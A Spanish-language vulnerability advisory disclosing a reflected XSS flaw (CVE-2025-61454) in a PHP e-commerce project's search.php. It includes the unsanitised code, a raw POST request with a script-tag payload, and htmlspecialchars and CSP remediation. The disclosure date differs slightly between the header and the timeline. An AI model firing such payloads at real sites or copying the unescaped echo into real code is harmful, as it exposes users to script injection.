
Divulgación pública y prueba de concepto para CVE-2025-61454, una vulnerabilidad de XSS reflejado en search.php de E-commerce Project v1.0, que incluye pasos de explotación y orientación de remediación.
Fecha de divulgación: 14 de octubre de 2025
ID de CVE: CVE-2025-61454
Severidad: MEDIA (CVSS 6.1)
Existe una vulnerabilidad de Cross-Site Scripting (XSS) reflejado en el Proyecto de Comercio Electrónico v1.0, específicamente dentro del endpoint search.php. La entrada sin sanitizar en el parámetro search se refleja directamente en el HTML de la respuesta, lo que permite a los atacantes ejecutar JavaScript arbitrario en el navegador de un usuario que visita un enlace malicioso o envía una solicitud manipulada.
A este problema se le ha asignado el identificador CVE-2025-61454. En el momento de la divulgación, no se ha publicado ningún parche por parte del proveedor.
search.phphttp://localhost/e-commerce-main/search.phpEl servidor no sanitiza adecuadamente el parámetro search de los datos POST antes de reflejarlo en el HTML de la respuesta. Esto permite a los atacantes inyectar payloads de JavaScript, lo que conduce a la ejecución de código en el lado del cliente.
Un atacante crea una entrada que contiene contenido similar a scripts incrustados y la envía al endpoint POST vulnerable. Debido a que el servidor refleja la entrada en la respuesta HTML sin aplicar la codificación adecuada de HTML/atributos/JS, el navegador trata el contenido reflejado como marcado ejecutable y lo ejecuta. Este es un escenario de XSS reflejado (no persistente); el atacante debe persuadir a la víctima para que realice la solicitud o visite un enlace/formulario especialmente construido.
$search = $_POST['search'];
echo "<div>Search results for: $search</div>";
| ID de CWE | Título |
|---|---|
| CWE-79 | Neutralización incorrecta de la entrada durante la generación de páginas web ('Cross-site Scripting') |
| Puntuación | Severidad | Cadena de Vector |
|---|---|---|
| 6.1 | MEDIA | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
Una explotación exitosa podría resultar en:
git clone https://github.com/Bhabishya-123/E-commerce.git
Use XAMPP/LAMP para implementar el proyecto y acceder a la aplicación.
POST /e-commerce-main/search.php HTTP/1.1
Host: localhost
Referer: https://localhost/e-commerce-main/
Content-Type: application/x-www-form-urlencoded
search=yxo9p%3cscript%3ealert(1)%3c%2fscript%3exnzmd&submit=
search=yxo9p<script>alert(1)</script>xnzmd&submit=
yxo9p<script>alert(1)</script>xnzmd
Explicación:
El payload <script>alert(1)</script> está incrustado dentro del parámetro de búsqueda. Cuando una víctima envía un formulario de búsqueda con este payload malicioso (o es engañada para hacerlo mediante ingeniería social), el JavaScript se ejecuta en el contexto de su navegador.
Si es vulnerable, el navegador ejecutará el código JavaScript, mostrando un cuadro de alerta con el valor 1. Esto confirma la explotación exitosa del XSS.
htmlspecialchars() o equivalente para codificar toda salida no confiable antes de renderizarla en HTML.$search = htmlspecialchars($_POST['search'], ENT_QUOTES, 'UTF-8');
echo "<div>Search results for: $search</div>";
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
| Evento | Fecha |
|---|---|
| Vulnerabilidad descubierta | 16 de septiembre de 2025 |
| Divulgación pública | 13 de octubre de 2025 |
| Parche disponible | ❌ No disponible al momento de la divulgación |
Esta vulnerabilidad fue descubierta y divulgada por:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 Este aviso se publica de forma independiente debido a la ausencia de un parche oficial del proveedor.